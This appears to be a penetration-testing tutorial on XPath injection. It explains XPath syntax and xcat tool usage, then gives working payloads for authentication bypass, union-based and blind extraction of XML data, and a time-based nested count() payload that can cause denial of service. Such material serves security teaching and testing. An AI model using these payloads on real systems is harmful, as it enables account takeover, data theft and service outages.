XPath Injection
XML Path Language (XPath) is a query language to retrieve data from XML documents, typically used in web application that retrieve data stored in an XML format.
When applications allow user input to be inserted in XPath queries without proper sanitization, it is possible to successfully exploit this vulnerability to retrieve the entire XML document, meaning an attacker will get access to all data stored inside the document.
XPath injection is basically the XML equivalent of SQL injection for databases
Automatic Injection using XCAT
pip3 install cython
pip3 install xcat
Usage: xcat [OPTIONS] COMMAND [ARGS]...
The commands are:
detect: detect and print the type of injection found
injections: print all types of injection supported by xcat
ip: print the current external IP address
run: retrieve the XML document by exploiting the XPath injection
shell: xcat shell to run system commands
Find more info on commands using:
xcat <command> --help.Detect if a non-blind endpoint is vulnerable to XPath Injection:
xcat detect <url> <vulnerable-param> param1=value1 param2=value2 --true-string='invalid-input-string'
Exfiltrate the XML document (via POST request):
xcat run <url> <vulnerable-param> param1=value1 --true-string=successfully -m POST --encode FORM
XPath Fundamentals
Basic Concepts
XML documents contain data formatted in a tree structure of nodes with the top element being the root element node. Each node aside from the root has exactly one parent node, while each element node may have an arbitrary number of child nodes.
Nodes with the same parent are called sibling nodes. Traversing upwards or downwards from a given node determines all its ancestor nodes or descendant nodes.
An example XML document would be the following:
<?xml version="1.0" encoding="UTF-8"?>
<bookstore>
<book>
<title lang="en">The name of the rose</title>
<author>Umberto Eco</author>
<price currency="dollar">5,00</price>
<category>Novel</category>
</book>
</bookstore>In the example:
bookstore is the
root element node.title, author, price and category are
element nodes.lang and currency are
attribute nodes.title, author, price and category are
siblings, with book being theirparent.
Selecting Data
Each XPath query selects a set of nodes from the XML document. A query is evaluated from a context node, which marks its starting point. This means that, depending on the context node, the same query may have different results.
There are several ways to select nodes in XPath. Some basic example queries are:
example
Select all example child nodes of the context node
/
Select the document root node
//
Select descendant nodes of the context node
.
Select the context node
..
Select the parent node of the context node
@attributeName
Select the attributeName attribute node of the context node
text()
Select all text node child nodes of the context node
query1 | query2
Combine multiple queries with the union operator
Starting from the previous basic queries, it is possible to construct more complex queries, such as:
/bookstore/book- Select all book child nodes of the bookstore node/bookstore//title- Select all title nodes that are descendant of the bookstore node/bookstore/book/price/@currency- Select all currency attribute nodes of all price nodes under book elements that are child nodes of the bookstore node//book- Select all books//@currency- Select all currency attribute nodes
Notice:
Any query starting with // is evaluated from the document root and not at the context node.
Filtering data via Predicates
Predicates filter the result from an XPath query similar to the WHERE clause in a SQL query.
Predicates are part of the XPath query and are contained within [].
Some examples are:
Select
/bookstore/book[1]- Select the first book from the bookstore node/bookstore/book[position()<10]- Select the first 9 books//book/title[@lang]/../category- Select the category of all books with a title having a language
It is also possible to use wildcards such as
node()- Matches any node*- Matches any element node@*- Matches any attribute node
Notice that the * wildcard matches any node, not any descendant node.
To do that you can use //, or alternatives, such as /*/*/title to match all titles of all books in the bookstore
Authentication Bypass
An application might implement authentication via XML data containing all users' credentials.
In this case, to perform authentication, the web application might execute an XPath queries to check for the user data, such as the following:
/users/user[username/text()='<username>' and password/text()='<password>'In this case, if no checks are performed on user input, it is easily possible to bypass authentication using a query that always evaluates to true, such as
username = ' or '1'='1
password = ' or '1'='1
resulting query:
/users/user[username/text()='' or '1'='1' and password/text()='' or '1'='1']This will allow us to login as the first user inside the XML-data.
If known, it is possible to inject a valid username and a true condition for the password, such as
username = administrator
password = ' or '1'='1
resulting query:
/users/user[username/text()='administrator' and password/text()='' or '1'='1']In more realistic cases, we might not know any valid username. Also, the password is most probably hashed, meaning that the password payload will be hashed. For example:
username = ' or '1'='1
password = ' or '1'='1
resulting query:
/users/user[username/text()='' or '1'='1' and password/text()='<MD5-hash>']To properly bypass authentication in these cases, we can inject a double or condition to gain a universally true condition, for example:
username = ' or true() or '
password = ' or '1'='1
/users/user[username/text()='' or true() or '' and password/text()='<MD5-hash>']Explaination - Getting a universally true condition:
The and predicate of a XPath query is resolved first, compared to the or predicate.
In a realistic case, no passwords equal to the MD5 hash exist, so the and condition will be resolved to false.
Because of that, the resulting query will become:
/users/user[username/text()='' or true() or false
Since true() is present, the whole query (two or operators) evaluates to true for every <user> node.
This means that the expression will return all /users/user nodes.
The application will then match the first node, meaning you will login as the first user in the document.
Again, this will make us login as the first user in the XML-data. To login as another user without knowing their username, we might use the position() operator:
username = ' or position()=2 or '
password = ' or '1'='1
/users/user[username/text()='' or position()=2 or '' and password/text()='<MD5-hash>']Lastly, we can use the contains() operator to find all usernames containing a specific substring.
This allows targeting accounts containing a specific word in their usernames (which we might know).
username = ' or contains(.,'admin') or '
password = ' or '1'='1
/users/user[username/text()='' or contains(.,'admin') or '' and password/text()='<MD5-hash>']Data Exfiltration
Union Based
We can try to access arbitrary data from XML documents using techniques similar to UNION-based SQL injections. For this example, consider a bookstore web application with a search functionality that uses two GET parameters:
?q=<input>- finds books containing the user's search string.&f=<input>- selects a property of the book to display (example: title)
By analyzing the web application's behavior, we can deduce the performed XPath query:
/a/b/c/[contains(d/text(), 'q')]/fwhich, considering an HTTP request such as:
GET /search.php?q=harrypotter&f=title HTTP/1.1would turn to:
/a/b/c/[contains(d/text(), 'harrypotter')]/titleThe search string we provide in the GET parameter q is inserted in the predicate that filters the books using the contains function. After that, the GET parameter f determines the property the web application displays from all matching books (title, for example), which is why it is appended at the end of the query.
We can confirm XPath injection by sending the payload a') or ('1'='1 in the q parameter and leaving the f parameter to title. This would result in the following XPath query:
/a/b/c/[contains(d/text(), 'a') or ('1'='1')]/titleWhile our provided substring is invalid, the injected or clause evaluates to true such that the predicate becomes universally true. Therefore, it matches all nodes at that depth. With this payload, the web application responds with all book titles, thus confirming the XPath injection vulnerability
Unlike SQL, XPath does not support in-line comment delimiters inside an expression, meaning you cannot comment out part of an XPath query using characters like -- or # for SQL
The next step is to construct a query that returns the entire XML document. The simplest is to append a new query that returns all text nodes:
GET /search.php?q=SOMETHINGINVALID&f=title+|+//text() HTTP/1.1We could also achieve the same result by using:
q = SOMETHINGINVALID') or ('1'='1
f = ../../..//text()
The web application will then execute the following query:
/a/b/c/[contains(d/text(), 'SOMETHINGINVALID')]/title | //text()We are appending a second query with the | operator, similar to a UNION-based SQL injection.
The second query, //text(), returns all text nodes in the XML document.
Therefore, the response contains all data stored in the XML document.
Identifying the Schema Depth
It isn't always possible to leverage a query to directly extract all the document's data in one shot: an XPath query may only return a limited number of results - in that case, you can only access one information at a time.
To exfiltrate all the document's data in this scenario, we need to gain information about the schema's structure and depth. We can gain information about the schema's structure and depth using an iterative process where we inject queries that ensure the original XPath query returns no results and, each time, appending a new query that gives us information about the schema depth.
In particular, we can inject a union query operator followed by a subquery which starts from the document root element node: <XPath Query> | /*[1]
The subquery /*[1] starts at the document root /, moves one node down the node tree due to the wildcard *, and selects the first child due to the predicate [1]. Thus, this subquery selects the document root's first child, the document root element node
By doing that, the web application will most probably not return data: the web application expects a single return value, but the injected query returns the entirety of the document root element node, which is an array.
We can understand the depth of the XML document by iteratively appending an additional /*[1] to the subquery until the behavior of the web application changes:
<XPath Query> | /*[1]
<XPath Query> | /*[1]/*[1]
<XPath Query> | /*[1]/*[1]/*[1]
<XPath Query> | /*[1]/*[1]/*[1]/*[1]
.....Once the web application finally returns some data, we can deduce that the schema is at least equal to the amount of appended payloads.
This process allows you to understand the depth for the node you are expanding. There might be other deeper nodes, which would increase the document's depth.
To return all the information in the element nodes, we need to find the element node names by iterating the previous payload and changing the first child to the second, then the third and so on:
<XPath Query> | /*[1]/*[1]/*[1]/*[1]
<XPath Query> | /*[1]/*[1]/*[1]/*[2]
<XPath Query> | /*[1]/*[1]/*[1]/*[3]
<XPath Query> | /*[1]/*[1]/*[1]/*[4]
.....Iterating this process for all element nodes will allow access the entire XML document.
Example iteration:
<XPath Query> | /*[1]/*[1]/*[1]/*[1]
<XPath Query> | /*[1]/*[1]/*[1]/*[2]
.....
<XPath Query> | /*[1]/*[1]/*[2]/*[1]
<XPath Query> | /*[1]/*[1]/*[2]/*[2]
<XPath Query> | /*[1]/*[1]/*[2]/*[2]
.....
<XPath Query> | /*[1]/*[2]/*[1]/*[1]
<XPath Query> | /*[1]/*[2]/*[1]/*[2]
.....Blind Exfiltration
Similarly to Blind SQL Injections, the web application may not display the query results to us, but it may still be possible to exfiltrate data. Differently from SQL, there is no sleep function in XPath, so we need other indicators that tell us whether the XPath query was injected.
While there is no sleep function in XPath, it is still possible to perform time-based exploitation, as shown in the next section
The idea behind the blind exfiltration process is to enumerate the name of element nodes to construct XPath queries without wildcards to narrow our queries to target interesting data points.
There are 4 functions that can help with this process:
name(): allows determining a node's namesubstring(): exfiltrate a node name one character at a timestring-length(): determine the length of a node name to know when to stop the exfiltrationcount(): returns the number of children of an element node.
Consider an example web application that allows users to chat. The web applications start a chat with a user via the page chat.php?username=sfoffo
If a chat is started with an invalid username, the web application prints an error message. If the username is valid, the chat page is opened. This is a difference in responses that we need to consider to properly perform the blind exfiltration
Since the application performs a user existance check, we can guess the underlying XPath query is similar to the following: /users/user[username='input']. To confirm, we can use a payload such as invalid' or '1'='1 to gain the query: /users/user[username='invalid' or '1'='1'].
The application will then act like a valid username was found, since the check returns true.
1. Exfiltrating the Length of a Node Name
To exfiltrate the length of the root node's name, we can use the payload
Payload:
invalid' or string-length(name(/*[1]))=1 and '1'='1
Full Query:
/users/user[username='invalid' or string-length(name(/*[1]))=1 and '1'='1']this query returns data only if string-length(name(/*[1]))=1 is true, meaning the length of the root element node's name is 1. The previous query needs to be iterated until the application's response is the same as for a valid username.
2. Exfiltrating a Node Name
Now that we know the length of the node's name, we can exfiltrate the name character by character.
To do that, we need to use
Payload:
invalid' or substring(name(/*[1]),1,1)='a' and '1'='1
Full Query:
/users/user[username='invalid' or substring(name(/*[1]),1,1)='a' and '1'='1']The query returns data only if the first character of the root node's name equals to a. This query needs to be iterated for all character until the web application's response is valid.
Finally, the payload needs to be iterated for the next character positions to find the entire node name:
invalid' or substring(name(/*[1]),2,1)='<letter>' and '1'='1
invalid' or substring(name(/*[1]),3,1)='<letter>' and '1'='1
invalid' or substring(name(/*[1]),4,1)='<letter>' and '1'='1
invalid' or substring(name(/*[1]),5,1)='<letter>' and '1'='1'3. Exfiltrating the Number of Child Nodes
To determine the number of child nodes for a given node, we can use the count() function in a payload:
Payload:
invalid' or count(/users/*)=1 and '1'='1
Full Query:
/users/user[username='invalid' or count(/users/*)=1 and '1'='1']This query returns data if we successfully found the number of child nodes of the node.
After exfiltrating the number of child nodes, you can repeat the entire process to find the entire document's structure.
4. Exfiltrating Data
After you have identified the XML document structure, you can proceed with data exfiltration using the same ideas already mentioned.
The first step is to find the number of characters of the first username
Payload:
invalid' or string-length(/users/user[1]/username)=1 and '1'='1
Full Query:
/users/user[username='invalid' or string-length(/users/user[1]/username)=1 and '1'='1']Then, find all characters of the username based on the amount of letters it contains:
Payload:
invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1, resulting in the following XPath query:
Full Query:
/users/user[username='invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1']Finally, iterate through all characters until the entire username is exfiltrated.
Time-Based Exploitation
In fully blind scenarios (where the response is the same whether the input is valid or not), it is possible to abuse the processing time of the web application to create behavior similar to a sleep function.
In particular, you can force the web application to iterate over the entire XML document by recursively calling the count function with stacked predicates to force the web application to iterate over all nodes in the XML document exponentially, wasting a lot of time.
Consider a payload such as the following:
Payload:
invalid' or substring(/users/user[1]/username,1,1)='a' and count((//.)[count((//.))]) and '1'='1
Full Query:
/users/user[username='invalid' or substring(/users/user[1]/username,1,1)='a' and count((//.)[count((//.))]) and '1'='1']
If the condition substring(/users/user[1]/username,1,1)='a' is true, the second part of the and clause will be evaluated, meaning that the double count will exponentially iterate over the XML document, causing a large time delay. If the conditions is false, the exponential count will not start, meaning that the first character of the username is not a.
Using this idea, we can exfiltrate all the XML document's data.
If the XML document is large, this payload can quickly result in a Denial-of-Service. Be careful!